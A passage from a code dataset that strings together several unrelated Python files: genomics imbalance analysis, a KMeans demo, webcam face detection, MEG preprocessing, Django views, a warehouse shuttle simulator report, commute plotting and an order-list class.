\"\\n\")\n outfile2.write(sample + \"\\t\" + gene + \"\\t\" + str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\n\")\n else :\n outfile.write(\"\" + \"\\n\")\n '''NTRK3'''\n if gene == \"NTRK3\" :\n for d in avg_depth_list :\n if i <= 7 :\n gene_start += d / bam_dict[bam]\n elif i >= 11 :\n gene_end += d / bam_dict[bam]\n if i >= 11 :\n coverage += d / bam_dict[bam]\n i += 1\n gene_start /= 8.0\n gene_end /= 5.0\n coverage /= 5.0\n imbalance = gene_end / gene_start\n outfile.write(str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\t\")\n if imbalance > 1.0 and coverage > 200.0 :\n #if imbalance > 1.0 and coverage > 40.0 :\n outfile.write(\"Imbalance\" + \"\\n\")\n outfile2.write(sample + \"\\t\" + gene + \"\\t\" + str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\n\")\n else :\n outfile.write(\"\" + \"\\n\")\n '''ROS1'''\n if gene == \"ROS1\" :\n for d in avg_depth_list :\n if i <= 6 :\n gene_start += d / bam_dict[bam]\n elif i >= 12 :\n gene_end += d / bam_dict[bam]\n if i >= 12 :\n coverage += d / bam_dict[bam]\n i += 1\n gene_start /= 7.0\n gene_end /= 7.0\n coverage /= 7.0\n imbalance = gene_end / gene_start\n outfile.write(str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\t\")\n if imbalance > 3.0 and coverage > 0.0 :\n outfile.write(\"Imbalance\" + \"\\n\")\n outfile2.write(sample + \"\\t\" + gene + \"\\t\" + str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\n\")\n else :\n outfile.write(\"\" + \"\\n\")\noutfile.close()\noutfile2.close()\n\nfor gene in gene_files :\n outfile3 = open(\"Results/RNA/Imbalance/imbalance_\" + gene + \"_exons.txt\", \"w\")\n outfile3.write(\"Sample\")\n for exon in exon_result_dict[bam][gene][0] :\n outfile3.write(\"\\t\" + exon[0])\n outfile3.write(\"\\n\")\n for bam in bam_files :\n sample = bam.split(\"/\")[-1].split(\"Aligned\")[0]\n i = 0\n for exon in exon_result_dict[bam][gene][0] :\n if i == 0 :\n outfile3.write(sample)\n outfile3.write(\"\\t\" + str(round(exon[4],1)))\n i += 1\n outfile3.write(\"\\n\")\n outfile3.close()\n","sub_path":"src/Imbalance.py","file_name":"Imbalance.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"378072455","text":"from sklearn.cluster import KMeans\r\nX = [[1],[2],[3],[4],[5]]\r\ny = [4,2,6,1,3]\r\nclf = KMeans(n_clusters=2)\r\nclf.fit(X,y)\r\nprint(clf)\r\nprint(clf.labels_) \r\n\r\nimport matplotlib.pyplot as plt\r\nplt.plot(X, y, 'ks')\r\nplt.show()\r\n","sub_path":"第2章数据分析常用库/test02_06.py","file_name":"test02_06.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"585007988","text":"import cv2\nimport numpy as np\n\n#pra capturar o vídeo\ncap = cv2.VideoCapture(0)\n\n#carregando o modelo pré-treinado\nfaceClassif = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nwhile True:\n\t#pra ler a captura de vídeo\n ret,frame = cap.read()\n #convertendo a captura pra preto e branco pra ficar mais facil na hora de virar binário\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n #modelando o classificador de rosto\n faces = faceClassif.detectMultiScale(gray, 1.3, 5)\n\n #capturar o retangulo do rosto\n for (x,y,w,h) in faces:\n cv2.rectangle(frame, (x,y),(x+w,y+h),(0,255,0),2)\n #pra mostrar a gravação \n cv2.imshow('frame',frame)\n \n\n #botão pra parar a cam\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"detec-rosto-cam.py","file_name":"detec-rosto-cam.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"441916031","text":"\"\"\"\nTrain in syllable localizer (ka, fi, nu) test in task\n\"\"\"\nimport numpy as np\nimport pickle\nimport os.path as op\nimport pandas as pd\n\nfrom mne import find_events, Epochs\nfrom mne.epochs import concatenate_epochs\nfrom mne.io import read_raw_kit\n\nfrom jr.meg import least_square_reference\n\nfrom data.R1022_160204 import meg_files, session\n\n# data_path = '/media/DATA/Pro/Projects/NewYork/audio_wm/data/'\ndata_path = op.join('/media/jrking/harddrive/Audio_sequence/data/', session)\n\nruns = meg_files.query('typ == \"main\"')\nparams = [dict(name='sounds', query=None, tmin=-.200, tmax=.700),\n dict(name='targets', query='type==\"target\" & sound_idx==0',\n tmin=-.200, tmax=1.500),\n dict(name='probes', query='type==\"probe\" & sound_idx==0',\n tmin=-.200, tmax=1.500)]\nfor param in params:\n all_epochs = list()\n all_events = list()\n for ii, run in runs.iterrows():\n meg = op.join(data_path, run.fname)\n mrk = op.join(data_path, run.marker)\n hsp = op.join(data_path, run.hsp)\n elp = op.join(data_path, run.elp)\n bhv = op.join(data_path, run.bhv)\n\n # Read behavior file and make event DataFrame\n with open(bhv, 'rb') as f:\n bhv = pickle.load(f)\n events = list()\n for t, trial in enumerate(bhv.entries):\n for typ in ['target', 'probe']:\n for n in range(trial['n_sounds']):\n events.append(dict(\n onset=trial['trigger_on_%s_%i' % (typ, n)],\n offset=trial['trigger_off_%s_%i' % (typ, n)],\n trigger=trial['trigger_value_%s_%i' % (typ, n)],\n sound=trial[typ][n].split('_f5')[0],\n type=typ, trial=t, sound_idx=n,\n mismatch_position=trial['mismatch_position']))\n bhv_events = pd.DataFrame(events)\n\n # Read data\n raw = read_raw_kit(meg, preload=True, mrk=mrk, elp=elp, hsp=hsp)\n for bad in run.bad_channels:\n raw.info['bads'] += [bad]\n\n # Correct signal trigger\n raw._data[-1, :] -= 255\n raw._data[-1, :] *= -1\n events = find_events(raw, min_duration=.010) # MEG events\n sel_trigger = np.unique(bhv_events['trigger']) # Trigger values\n # Subselect only target and probe events\n events = np.array([e for e in events if e[2] in sel_trigger])\n np.testing.assert_array_equal(events[:, 2], bhv_events['trigger'])\n # subselect\n if param['query']:\n bhv_events = bhv_events.query(param['query'])\n events = events[bhv_events.index]\n event_id = {str(val): val for val in np.unique(bhv_events['trigger'])}\n\n # Apply Least Square projection from ref channels\n raw = least_square_reference(raw)\n\n # Interpolate bad channels\n raw.interpolate_bads()\n\n # Apply Least Square projection from ref channels\n raw = least_square_reference(raw)\n\n # Filter\n raw.filter(.51, h_freq=30.0)\n\n # Epoch all sounds\n epochs = Epochs(raw, events, tmin=param['tmin'], tmax=param['tmax'],\n baseline=None, verbose=False, event_id=event_id)\n epochs.decimate(10)\n all_epochs.append(epochs)\n all_events.append(bhv_events)\n # Save\n epochs = concatenate_epochs(all_epochs)\n epochs.save(op.join(data_path, param['name'] + '-epo.fif'))\n events = pd.concat(all_events)\n with open(op.join(data_path, param['name'] + '-eve.pkl'), 'wb') as f:\n pickle.dump(events, f)\n # Clear memory\n epochs = events = all_events = all_epochs = None\n","sub_path":"scripts/analysis/pilots/R1022_2.4.16/main_task_preprocess.py","file_name":"main_task_preprocess.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"626550021","text":"from os import getenv\nimport logging\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.contrib.sites.models import Site\nfrom django.db.models import Q\nfrom django.shortcuts import redirect, render\nfrom django.utils import timezone\nfrom django.views.decorators.cache import cache_control\nfrom django.views.generic import TemplateView, RedirectView\nfrom rest_framework.authtoken.models import Token\n\nfrom api.constants import AngularPages\nfrom web.constants import SAVE_THE_DATE_ID\n\n\nlogger = logging.getLogger(__name__)\n\nclass BaseMixin(object):\n def get_context_data(self, **kwargs):\n\n context = super(BaseMixin, self).get_context_data(**kwargs)\n\n if self.token:\n context['auth_token'] = self.token.key\n context['friendly_name'] = self.token.user.userprofile.friendly_name\n context['base_url'] = getenv('BASEURL', \"https://{}\".format(Site.objects.get(id=1)))\n context['event_date'] = settings.EVENT_DATE or ''\n context['page'] = self.page\n\n return context\n\n\nclass UnAuthenticatedView(TemplateView):\n template_name = 'unauthenticated.html'\n\n @cache_control(public=True)\n def get(self, request, *args, **kwargs):\n response = super(UnAuthenticatedView, self).get(request, *args, **kwargs)\n\n try:\n token = Token.objects.get(key=self.request.COOKIES.get('auth_token', ''))\n except Token.DoesNotExist:\n pass\n else:\n return redirect('web-home', username=token.user.username)\n\n return response\n\n def post(self, request, *args, **kwargs):\n response = super(UnAuthenticatedView, self).get(request, *args, **kwargs)\n\n email = request.POST.get('email')\n username = request.POST.get('token')\n user = None\n\n try:\n if email:\n user = User.objects.get(email=email)\n elif username:\n user = User.objects.get(username=username)\n else:\n return render(request, self.template_name, {'error': 'You need to enter something.'})\n except User.DoesNotExist:\n return render(request, self.template_name, {'error': 'User not found.'})\n\n return redirect('web-home', username=user.username)\n\n\nclass MainView(BaseMixin, TemplateView):\n template_name = 'main.html'\n\n @cache_control(private=True)\n def get(self, request, username, *args, **kwargs):\n try:\n user = User.objects.get(username=username)\n self.token = Token.objects.get(user=user)\n except (User.DoesNotExist, Token.DoesNotExist):\n self.token = None\n\n self.page = self.request.COOKIES.get('page', '')\n response = super(MainView, self).get(request, *args, **kwargs)\n response.delete_cookie('page')\n\n if self.token:\n response.set_cookie(key='auth_token', value=self.token.key)\n userprofile = self.token.user.userprofile\n userprofile.date_viewed = timezone.now()\n userprofile.save()\n else:\n return redirect('unauthenticated-web-home')\n\n return response\n\n\nclass SaveTheDateView(RedirectView):\n pattern_name = 'web-home'\n # query_string = True\n\n def get(self, request, username=None, *args, **kwargs):\n response = super(SaveTheDateView, self).get(request, username, *args, **kwargs)\n response.set_cookie(key='page', value=SAVE_THE_DATE_ID)\n return response\n","sub_path":"kromeo2015/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"600775294","text":"import numpy as np\nimport pandas as pd\nimport datetime\nfrom openpyxl.chart import Reference, BarChart, PieChart\nfrom openpyxl.chart.layout import Layout, ManualLayout\nfrom Basic.excelhandler import ExcelHelper, title\nfrom ShuttleSim.shelf import *\n\n\nclass Simulator:\n # def __init__(self):\n\n @classmethod\n def sim(self, project_id, shuttle_model='', nlifts=0, nshuttles=0, hour=4):\n ConfigShelf.load_setting(project_id)\n if (shuttle_model == ''):\n shuttle_model = ConfigShelf.shuttle_model\n ConfigShuttle.load_setting(shuttle_model)\n G.Arrival_mean = 3600 / (ConfigShelf.DualCyclePerHR) / 1.05\n\n # simulator=EngSimulator\n # sim = simulator(\"ssi-sh-hella\", 'v2h')\n # G.Arrival_mean =10000\n result = self._runonce(nlifts, nshuttles, hour)\n if (input('Need Detail Reporting?(Y)') == 'y'):\n rep = SimReporter()\n rep.report(*result, False)\n # rep.report(result[0], result[1], result[2])\n\n @classmethod\n def _runonce(self, nlifts=0, nshuttles=0, hour=1):\n def _clear_setting():\n ShelfArea.NextID = 0\n ShelfArea.total_location_list = []\n Lift.NextID = 0\n StdShuttle.NextID = 0\n G.clear_setting()\n\n _clear_setting()\n\n if (nlifts > 0):\n ConfigShelf.NLifts = nlifts\n if (nshuttles > 0):\n ConfigShelf.NShuttles = nshuttles\n ShelfArea.build_via_lift(ConfigShelf.NLifts, ConfigShelf.NShuttles)\n\n print(\"Simulation Start!\", \"Lift:%i Shuttle:%i\" % (ConfigShelf.NLifts, ConfigShelf.NShuttles))\n G.sim_hour = hour\n G.env.run(until=G.sim_hour * 3600)\n\n logs = df = pd.DataFrame(G.Logs)\n inbound = df[df[\"Task_Type\"] == \"inbound_box_take\"].shape[0] / hour\n outbound = df[df[\"Task_Type\"] == \"outbound_box_putaway\"].shape[0] / hour\n\n print(\"Simulation finished!\")\n print(\"入库/小时:%.1f\" % inbound)\n print(\"出库/小时:%.1f\" % outbound)\n return [logs, inbound, outbound]\n\n\nclass SimReporter:\n def __init__(self):\n # self.pagerows = 60\n self.excelhelper = ExcelHelper()\n self.ws = self.excelhelper.get_sheet(if_exist=\"replace\")\n\n def report(self, logs, inbound, outbound, csvlog=True):\n print(\"Report Generating...\")\n self.logs = logs\n self.inbound = inbound\n self.outbound = outbound\n\n if (csvlog):\n self.logs.to_csv(\"D:/log.csv\")\n\n self.excelhelper.df_to_excel(self.logs, \"logs\", if_exist=\"replace\")\n\n self.frontpage()\n self.nextpage()\n self.parameters()\n self.nextpage()\n self.setting()\n self.nextpage()\n self.result()\n self.nextpage()\n\n self.ws.print_area = \"A1:E\" + str(self.ws._current_row)\n # self.draw_bar()\n\n print(\"Exporting! DO NOT Shutdown!!\")\n self.excelhelper.save()\n print(\"Report Exported!\")\n\n def append(self, list, style=None):\n for i, field in enumerate(list):\n if type(field) == np.float64:\n list[i] = \"%.1f\" % field\n else:\n list[i] = str(field)\n\n # print(self.ws._current_row)\n self.ws.append(list)\n if style is not None:\n for i in range(len(list)):\n self.ws.cell(row=self.ws._current_row, column=i + 1).font = title\n\n def nextpage(self):\n curr = self.ws._current_row\n fpage = 54\n page = 60\n if curr <= fpage:\n rest = fpage - self.ws._current_row\n else:\n curr -= fpage\n rest = page - curr % page\n\n self._blank(rest)\n\n def _blank(self, lines=1):\n for i in range(lines):\n self.append(self.excelhelper.blank)\n\n def frontpage(self):\n self._blank(22)\n self.append([\"\", \"凯乐士Flash穿梭车系统\"], title)\n self.append([\"\", \"仿真报告\"], title)\n self._blank(1)\n self.append([\"\", \"Galaxis Flash Shuttle System\"], title)\n self.append([\"\", \"Simulation Report\"], title)\n self._blank(3)\n self.append([\"\", \"Copyright © 2016 Galaxis Automotion Management GmbH. All rights reserved.\"])\n self._blank(8)\n self.append([\"\", \"项目名称\", ShelfArea.AProject_name])\n self.append([\"\", \"Project_name\"])\n self._blank(1)\n self.append([\"\", \"客户名称\"])\n self.append([\"\", \"Customer\"])\n self._blank(1)\n self.append([\"\", \"\", datetime.date.today()])\n # self.append([\"\", \"Customer\"])\n # self._blank(3)\n\n def parameters(self):\n\n self.append([\"穿梭车系统设置\"])\n self.append([\"System Configuration\"])\n self.append([\"\", \"\", \"数量\", \"单元尺寸*\", \"总尺寸*\"])\n self.append([\"\", \"\", \"Number\", \"Unit Size*\", \"Total Size*\"])\n self.append([\"\", \"巷道\", ShelfArea.NAisles, ShelfArea.aisle_width, ShelfArea.areawidth])\n self.append([\"\", \"Aisle\"])\n self._blank()\n\n self.append([\"\", \"列\", ShelfArea.NBays, ShelfArea.beam_length, ShelfArea.arealength])\n self.append([\"\", \"Bay\"])\n self._blank()\n\n self.append([\"\", \"层\", ShelfArea.NLevels, ShelfArea.level_height, ShelfArea.areaheight])\n self.append([\"\", \"Level\"])\n self._blank()\n\n self.append([\"\", \"提升机数量\", Lift.NextID])\n self.append([\"\", \"Number of Lifts\"])\n self._blank()\n self.append([\"\", \"穿梭车数量\", StdShuttle.NextID])\n self.append([\"\", \"Number of Shuttles\"])\n self._blank()\n self.append([\"\", \"货位数量\", len(ShelfArea.total_location_list)])\n self.append([\"\", \"Number of Locations \"])\n self._blank()\n\n self.append([\"\", \"*所有尺寸均为仿真所用近似值,准确尺寸以图纸为准\"])\n self.append([\"\", \"*All dimensions are not accuracy but only an approach for simulation\"])\n self._blank(3)\n\n self.append([\"设备型号*\", ConfigShuttle.Model[0:2]])\n self.append([\"Equipment Parameter*\"])\n self.append([\"\", \"\", \"最大速度\", \"加速度\"])\n self.append([\"\", \"\", \"Maxspeed\", \"Acceleration\"])\n self.append([\"\", \"穿梭车直线行驶\", ConfigShuttle.longitudinal_maxspeed,\n ConfigShuttle.longitudinal_accelerate])\n self.append([\"\", \"Shuttle Longtitudinal\"])\n self._blank()\n self.append([\"\", \"穿梭车横向行驶\", ConfigShuttle.horizontal_maxspeed,\n ConfigShuttle.horizontal_accelerate])\n self.append([\"\", \"Shuttle Horizontal\"])\n self._blank()\n self.append([\"\", \"提升机提升\", ConfigShuttle.lift_up_maxspeed, ConfigShuttle.lift_up_accelerate])\n self.append([\"\", \"Lift\"])\n self._blank()\n # self.append([\"\", \"穿梭车装卸时间\", ConfigShuttle.load_time])\n # t = StdShuttle.drive_in_lift\n # self.append([\"\", \"穿梭车进入提升机时间\", t])\n # ws.append([\"\", \"Time Per Shuttle Pick\", G.pick_time])\n\n # self._blank(1)\n self.append([\"\", \"*以上参数仅为本次仿真参数,不作为交付标准的证明.实际设备参数请参考商务文件.\"])\n self.append([\"\", \"*Not commitment. For delivery standard, please check the business contract\"])\n\n # self.nextpage()\n\n def setting(self):\n\n self._blank(3)\n self.append([\"仿真设置\"])\n self.append([\"Simulation Setting\"])\n self.append([\"\", \"仿真时长\", G.sim_duration()])\n self.append([\"\", \"Simulation Duration\"])\n self._blank()\n self.append([\"\", \"双循环任务每小时\", ConfigShelf.DualCyclePerHR])\n self.append([\"\", \"Dual-Cycle Per Hr\"])\n self._blank()\n self.append([\"\", \"单循环任务每小时\", ConfigShelf.SingleCyclePerHR])\n self.append([\"\", \"Single-Cycle Per Hr\"])\n self._blank()\n self._blank(3)\n\n self.append([\"仿真前提条件\"])\n self.append([\"Simulation Assumption\"])\n self._blank(1)\n self.append([\" 入出提升机布置于同层平面\"])\n self.append([\" Infeed&Outfeed P&D station in same level\"])\n self._blank(1)\n self.append([\" 提升机始终保持双循环作业: 当一台穿梭车驶出之后, 提升机会装载另一台穿梭车并将其送至输送线层\"])\n self.append([\" Lift always work in dual-cycle mode:After send a shuttle into aisle,\"])\n self.append([\" Lift will pick another shuttle and bring it to p&d station\"])\n self._blank(1)\n self.append([\" 穿梭车尽量以双循环作业: 当卸载一个货物之后, 穿梭车会直接装载一个出库货物, 然后才返回提升机\"])\n self.append([\" Shuttle always try to work in dual-cycle mode:\"])\n self.append([\" After unload goods, shuttle will directly pick up another goods, then back to lift\"])\n self._blank(1)\n self.append([\" 出库端始终保持通畅(无需有额外等待时间)\"])\n self.append([\" Enough outfeed capacity to avoid wait on outfeed\"])\n self._blank()\n self.append([\" 入库任务服从poisson分布,也即到达间隔时间服指数分布\"])\n self.append([\" The arrival of inbound box obey a passion distribution\"])\n self.append([\" Thus inbound box arrives under an exponential distribution\"])\n self._blank(3)\n # self.nextpage()\n\n def result(self):\n def draw_bar(self):\n ws = self.ws\n end_row = ws._current_row - 1\n start_row = end_row - self.shuttle_job.shape[0]\n end_col = self.shuttle_job.shape[1]\n bar = BarChart()\n bar.height = 10\n bar.width = 18\n labels = Reference(ws, min_col=1, min_row=start_row + 1, max_col=1, max_row=end_row)\n data = Reference(ws, min_col=2, min_row=start_row, max_col=end_col, max_row=end_row)\n bar.add_data(data, titles_from_data=True)\n bar.set_categories(labels)\n bar.title = \"每小时完成作业量\\nTasks Finished by Hour\"\n ws.append(self.excelhelper.blank)\n ws.add_chart(bar, \"A\" + str(ws._current_row))\n ws._current_row += 20\n # self.nextpage()\n\n def utility(self, name):\n # self._blank(2)\n name_util = name + \"_util\"\n utility = self.logs.groupby([name, \"Task_Type\"]).sum()[\"TimeCost\"].unstack() / G.sim_duration()\n utility = utility.drop(\"\")\n # utility.fillna(0)\n utility.to_csv(\"D:\\\\\" + name_util + \".csv\")\n utility = utility.mean()\n self.excelhelper.series_to_excel(utility, name_util, if_exist=\"replace\")\n ws = self.excelhelper.get_sheet(name_util)\n\n pie = PieChart()\n pie.height = 13\n pie.width = 18\n labels = Reference(ws, min_col=1, min_row=1, max_col=15, max_row=1)\n data = Reference(ws, min_col=1, min_row=2, max_col=15, max_row=2)\n pie.add_data(data, from_rows=True)\n pie.set_categories(labels)\n # pie.layout.layoutTarget =\n # pie.style = 259\n pie.title = name + \" Timecost By Task Type\"\n wsd = self.excelhelper.get_sheet()\n # wsd.append(self.excelhelper.blank)\n wsd.add_chart(pie, \"A\" + str(wsd._current_row))\n wsd._current_row += 28\n\n self.append([\"仿真结果\"])\n self.append([\"Simulation Result\"])\n self._blank(3)\n\n self.append([\"系统整体吞吐(小时)\"])\n self.append([\"Hourly Performance of Whole System\"])\n self._blank()\n sgp = self.logs.groupby([\"Hour\", \"Task_Type\"])\n self.shuttle_job = sgp.count()[\"BoxID\"].unstack().reset_index()\n self.shuttle_job = self.shuttle_job.ix[:, [\"Hour\", \"inbound_box_take\", \"outbound_box_putaway\", \"pick_pieces\"]]\n\n self.shuttle_job = self.shuttle_job.fillna(0)\n # print(self.shuttle_job)\n self.excelhelper.df_to_excel(self.shuttle_job.astype(float))\n\n draw_bar(self)\n self._blank(3)\n self.append([\"单台设备整体吞吐/小时\"])\n self.append([\"Performance of Each Equopment\"])\n self.append([\"\", \"\", \"箱每小时\"])\n self.append([\"\", \"\", \"Box/Hour\"])\n self.append([\"\", \"每穿梭车入库\", self.inbound / ConfigShelf.NShuttles])\n self.append([\"\", \"Inbound per Shuttle\"])\n self._blank()\n self.append([\"\", \"每穿梭车出库\", self.outbound / ConfigShelf.NShuttles])\n self.append([\"\", \"Outbound per Shuttle\"])\n self._blank()\n self.append([\"\", \"每提升机入库\", self.inbound / ConfigShelf.NLifts])\n self.append([\"\", \"Inbound per Lift\"])\n self._blank()\n self.append([\"\", \"每提升机出库\", self.outbound / ConfigShelf.NLifts])\n self.append([\"\", \"Outbound per Lift\"])\n self._blank()\n\n self.nextpage()\n self._blank()\n utility(self, \"Shuttle\")\n utility(self, \"Lift\")\n","sub_path":"ShuttleSim/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":13056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"347839932","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\n#import matplotlib\n#matplotlib.use(\"Agg\")\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport random\n\n'''\ndef makeLine(i, j, xmax, ymin, ymax):\n if(((i+1)<=xmax)and((j-1)>=ymin)and((j+1)<=ymax)):\n makeLine(i+1, j-1, xmax, ymin, ymax)\n\n plt.plot([i,j], [i+1,j-1])\n plt.plot([i,j], [i+1,j+1])\n\n if(((i+1)<=xmax)and((j-1)>=ymin)and((j+1)<=ymax)):\n makeLine(i+1, j+1, xmax, ymin, ymax)\n'''\n\nxlist = []\nylist = []\nfor i in range(0, 31):\n xlist.append(i)\n ylist.append(i)\n\ni = 0\nwhile i < len(xlist):\n j = 0\n while j < len(ylist):\n plt.plot(xlist[i], ylist[j], \"ro\")\n j += 1\n i += 1\n\n#makeLine(0, len(ylist)/2, len(xlist)-1, 0, len(ylist)-1)\n\ni = 15\nj = 15\n#test_list = []\n#test_list.append(j)\n\nwhile (i+1)0 and (j+1)= 6) & (time.hour < 9):\n return 'morning'\n elif (time.hour >= 16) & (time.hour < 19):\n return 'evening'\n else:\n return None\n\ndef pricevdrives(frame, time):\n MPSFT = list(frame.Mean_List_Price_psqft.values)\n drive = 'combined_guess_'+time\n CBDT = list(frame[drive].values)\n zipcs = list(frame.ZIP.values)\n source = ColumnDataSource(data=dict(PriceSQFT=MPSFT, Combined_Drive=CBDT,\n ZIP = zipcs))\n title = \"Price per sqft VS {} Combined Commute\".format(time)\n p = figure(plot_height=350, toolbar_location=None, title=title)\n p.scatter(x='Combined_Drive', y='PriceSQFT', source=source, fill_color=factor_cmap('ZIP', palette=list(Category20[len(zipcs)]), factors=zipcs), size=15)\n p.y_range.end = 600\n p.x_range.end = 70\n labels = LabelSet(x='Combined_Drive', y='PriceSQFT', text='ZIP', level='glyph',\n x_offset=5, y_offset=5, source=source, render_mode='canvas')\n p.add_layout(labels)\n return p\n\n\nengine = create_engine(dbloc, echo=True)\nconnection = engine.connect()\ndata= pd.read_sql(\"SELECT * FROM driveestimates\", con=connection)\ndata.drop_duplicates(inplace=True)\n\ndata.columns = ['address', BaseConfig.PERSONA+'_guess', \n BaseConfig.PERSONA+'_traffic', BaseConfig.PERSONB+'_guess',\\\n BaseConfig.PERSONB+'_traffic', 'date_time']\n\n\ndata.columns = ['address', BaseConfig.PERSONA+'_guess', \n BaseConfig.PERSONA+'_traffic', BaseConfig.PERSONB+'_guess',\\\n BaseConfig.PERSONB+'_traffic', 'date_time']\ndata['cleandate']=data.date_time.apply(lambda x: pd.to_datetime(x))\ndata['hour'] = data.cleandate.apply(lambda x: int(x.hour))\ndata['commute'] =data.cleandate.apply(lambda x: id_drive(x))\ndata['ZIP']=data.address.apply(lambda x: x[-5:])\n\ncolors = Category20[len(data.ZIP.unique())]\ncolormap = {}\nfor i, j in enumerate(data.ZIP.unique()):\n colormap[j]=colors[i]\n \ndata['color']= data.ZIP.apply(lambda x: colormap[x]) \ndata.sort_values(by='ZIP', inplace=True)\nhouses =list(data.address.unique())\n\n## Sub-divide data\namdata = data[data['hour']<=12]\npmdata = data[data['hour']>=12]\nsourceAM = ColumnDataSource(amdata)\nsourcePM= ColumnDataSource(pmdata)\n\nhover = HoverTool(tooltips=[(\"address\",\"@address\")])\n## Make Tooltipsconfig\n##establish amplot\np1 = figure(title=\"Morning Drive Estimates From Google\", \n x_range=houses, y_range=(0, 90), plot_width=1700)\n\n\nama = p1.scatter(\"address\", BaseConfig.PERSONA+'_traffic', color='color',\n marker='inverted_triangle', source=sourceAM, size=10)\n\namb = p1.scatter(\"address\", BaseConfig.PERSONB+'_guess', color='color',\n marker='x', source=sourceAM, size=10)\n\n## add the pretties\nlegend = Legend(items=[\n (BaseConfig.PERSONA, [ama]),\\\n (BaseConfig.PERSONB, [amb]),\n ], location=(0, -30))\n\np1.xaxis.major_label_text_font_size=\"10pt\"\np1.xaxis.major_label_orientation = math.pi/2\np1.add_layout(legend, 'right')\np1.add_tools(hover)\n\n##establish amplot\np2 = figure(title=\"Evening Drive Estimates From Google\",\n x_range=houses, y_range=(0, 90), plot_width=1700)\npma = p2.scatter(\"address\", BaseConfig.PERSONA+'_traffic', color='color',\n marker='inverted_triangle', source=sourcePM, size=10)\n\npmb = p2.scatter(\"address\", BaseConfig.PERSONB+'_guess', color='color',\n marker='x', source=sourcePM, size=10) \n\n## add the pretties\nlegend2 = Legend(items=[\n (BaseConfig.PERSONA, [pma]),\\\n (BaseConfig.PERSONB, [pmb]),\n ], location=(0, -30))\n\np2.xaxis.major_label_text_font_size=\"12pt\"\np2.xaxis.major_label_orientation = math.pi/2\np2.add_layout(legend2, 'right')\np2.add_tools(hover)\n\n\n\n\nfrom bokeh.io import output_file, save\nfilename1 = 'morning_drives.html'\noutput_file(filename1)\nsave(p1)\n\n\nfilename2 = 'evening_drives.html'\noutput_file(filename2)\nsave(p2)\n\n","sub_path":"drive_compare.py","file_name":"drive_compare.py","file_ext":"py","file_size_in_byte":5540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"224085943","text":"from order_class import OnlineOrder\r\nfrom decorators import *\r\nfrom datetime import datetime as dt\r\n\r\n\r\nclass Orders:\r\n\r\n\r\n unique_ind = []\r\n\r\n\r\n\r\n def __init__(self):\r\n self.orders = []\r\n\r\n\r\n\r\n def add_to_list(self, order: OnlineOrder):\r\n self.orders.append(order)\r\n\r\n\r\n\r\n\r\n def remove_from_list(self, id):\r\n for i in range(len(self.orders)):\r\n if self.orders[i].get_field('id') == int(id):\r\n del self.orders[i]\r\n return\r\n\r\n\r\n\r\n\r\n def change(self, ind, order: OnlineOrder):\r\n self.orders[ind] = order\r\n\r\n\r\n\r\n def __getitem__(self, item):\r\n return self.orders[item]\r\n\r\n\r\n\r\n def print_list(self):\r\n for i in range(0, len(self.orders)):\r\n print(self.orders[i])\r\n\r\n\r\n\r\n def search_in_list(self, value):\r\n for i in self.orders:\r\n if i.search(value):\r\n print(i)\r\n\r\n\r\n\r\n def compare(self, param, x, y):\r\n if param == 'order_date':\r\n a = dt.strptime(x, \"%d.%m.%Y\")\r\n b = dt.strptime(y, \"%d.%m.%Y\")\r\n if a > b:\r\n return True\r\n return False\r\n\r\n\r\n\r\n def sort(self, param):\r\n for i in range(len(self.orders)):\r\n for j in range(len(self.orders) - i - 1):\r\n a = self.orders[j].get_field(param)\r\n b = self.orders[j + 1].get_field(param)\r\n if self.compare(param, a, b):\r\n self.orders[j], self.orders[j + 1] = self.orders[j + 1], self.orders[j]\r\n\r\n\r\n\r\n def rewrite_file(self, file):\r\n with open(file, 'w') as f:\r\n for i, elem in enumerate(self.orders):\r\n if i != len(self.orders) - 1:\r\n f.write(elem.str_format() + '\\n')\r\n else:\r\n f.write(elem.str_format())\r\n f.close()\r\n\r\n\r\n\r\n def add(self, val, file, param=None):\r\n arg = val.split()\r\n if len(arg) != 7:\r\n print('Not all arguments were inputeddd')\r\n return\r\n obj = OnlineOrder(arg)\r\n if obj.exist():\r\n if self.unique_ind.count(arg[0]) == 0:\r\n self.add_to_list(obj)\r\n self.unique_ind.append(arg[0])\r\n if param is None:\r\n self.rewrite_file(file)\r\n else:\r\n print('Id is not unique')\r\n\r\n def del_element_at(self, id):\r\n self.orders.pop(id)\r\n\r\n def remove(self, file, id):\r\n self.del_element_at(id)\r\n self.rewrite_file(file)\r\n\r\n\r\n\r\n\r\n def fill_list_from_file(self, file):\r\n f = open(file, 'r')\r\n input_lines = f.readlines()\r\n for line in 